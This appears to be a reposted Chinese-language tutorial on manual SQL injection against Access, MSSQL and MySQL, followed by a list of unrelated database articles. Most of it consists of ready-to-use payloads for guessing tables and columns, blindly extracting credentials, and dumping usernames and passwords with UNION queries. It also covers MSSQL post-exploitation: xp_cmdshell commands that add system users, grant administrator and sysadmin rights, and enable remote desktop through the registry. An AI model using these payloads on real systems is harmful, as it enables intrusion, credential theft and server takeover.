Access+Mssql+Mysql 手工注入基本流程

0x01

Access 注入

判断表名:adminand (select count(*) from admin)>0判断字段名:username,passwordadmin_user admin_pwdand (select count(admin_user) from admin)>0猜解值的长度:admin_user=5 admin_pwd=16and (select len(admin_user) from admin)=4依次尝试猜属性值:and (select left(admin_user,1) from admin)='a'在’ ‘中依次尝试字母数字and (select left(admin_user,2) from admin)='ad'and (select left(admin_user,3) from admin)='adm'偏移注入猜表名: and exists (select * from 你要猜得表名)查看是否存在表名 (存在的情况下页面刷新正常,同理猜字段一样的 结果存在admin)猜列名的字段名: and exists (select 你要猜的字段名 from 你已经才出来的表名)查看是否存在字段名(结果存在username和password)order by n 直到返回不正常,那么返回的列数就是n-1。n用二分法取。得出显位的数字union select 1,2,3,4,5,...,n-1 from admin 用显位猜解出字段内容union select 1,2,username,4,5,...,n-1 from admin

0x02

Mssql/sqlserver 注入

判断注入点:and 1=1 and 1=2猜版本:and 1=@@version猜用户名:and 1=user猜当前连接数据库:articleand 1=db_name()猜解其它数据库:and 1=(select name from master.dbo.sysdatabases where dbid=6)猜第一个表名:’admin’因为列的当前数据库,所以 sysobjects=article.sys.sysobjectsand (select top 1 name from sysobjects where xtype='u')>0猜其他表名:’t_jiaozhu’and (select top 1 name from sysobjects where xtype='u' and name not in('admin'))>0猜字段:username,passwordand (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0猜值and (select username from admin)>0破解密码MD5或者更改密码MD5值后续操作sqlserver 存储扩展应用建立系统用户:net user username pass /add系统提权net localgroup administrators username /add打开3389reg add "hklm\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f建立数据库用户:;exec master..sp_addlogin user,pass;--数据库提权:;exec master..sp_addsrvrolemember aa,sysadmin;--xp_cmdshell应用建立系统用户;exec master..xp_cmdshell "net user bb bb /add"--防止xp_cmdshell:;exec master..sp_dropextendedproc 'xp_cmdshell'恢复xp_cmdshell;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'彻底防溢出c:\windows\system32\cmd.exe 删除所有默认权限.添加administrator–完全控制

0x03

Mysql 注入

猜解字段数order by 3%23 union select 1,2,3%23获取当前数据库名union select 1,(select database()) ,3%23security获取所有数据库名union select 1,2,(select group_concat(schema_name) from information_schema.schemata)%23information_schema,challenges,mysql,performance_schema,security获取表名union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)%23emails,referers,uagents,users获取列名union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)%23id,username,password获取数据union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)%23获取数据库版本union select 1,@@version,database()%23

本文来自企鹅号 - HACK学习媒体

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏杨建荣的学习笔记

外部表简单总结(r3笔记第51天)

对于外部表的使用而言,可能是既陌生又熟悉的感觉,说陌生可能自己真正的使用机会要少一些,而熟悉可能是大家比较常用的通过外部表来查看数据库日志,其实外部表还有更丰富...

290110
来自专栏Porschev[钟慰]的专栏

MySQL数据同步【双主热备】

应用环境 数据库服务器  虚拟机  OS:  Windows Server 2003  1.数据库服务器242 IP:192.168.206.242   2...

327100
来自专栏我的博客

TP入门第八天

[小型留言板-增删查改] 1、先建立数据库lyb,然后建立表lyb_notes 建表代码如下: CREATE TABLE `lyb_notes` ( `id` ...

35880
来自专栏Linyb极客之路

Mysql慢查询日志的使用 和 Mysql的优化

1、临时开启慢查询日志(如果需要长时间开启,则需要更改mysql配置文件,第6点有介绍)

12820
来自专栏pydata

mysql使用总结

create database sina default character set utf8mb4 collate utf8mb4_unicode_ci; ...

10020
来自专栏散尽浮华

分布式监控系统Zabbix-3.0.3-完整安装记录(1)

分布式监控系统Zabbix-3.0.3的安装记录 环境说明 zabbix-server:192.168.1.30     #zabbix的服务端(若要监控本机,...

266100
来自专栏数据和云

深入原理:Consistent Reads 与 buffer cache

黄玮(Fuyuncat) 资深Oracle DBA,个人网www.HelloDBA.com,致力于数据库底层技术的研究,其作品获得广大同行的高度评价. 编辑手记...

37370
来自专栏Albert陈凯

2018-07-12 Oracle for update和for update nowait的区别Oracle for update和for update nowait的区别

原版排版太难看了看着闹眼睛。 https://www.cnblogs.com/quanweiru/archive/2012/11/09/2762223.htm...

11020
来自专栏王磊的博客

T-Sql备份还原数据库

代码如下: -- 备份数据库 BACKUP DATABASE 数据库名称 TO DISK = '物理存储位置' WITH FORMAT,CHECKSUM ...

32980
来自专栏散尽浮华

mysql主从同步(3)-percona-toolkit工具(数据一致性监测、延迟监控)使用梳理

在mysql工作中接触最多的就是mysql replication,mysql在复制方面还是会有一些常规问题,比如主库宕机或者从库宕机有可能会导致复制中断,通常...

584100

扫码关注云+社区

领取腾讯云代金券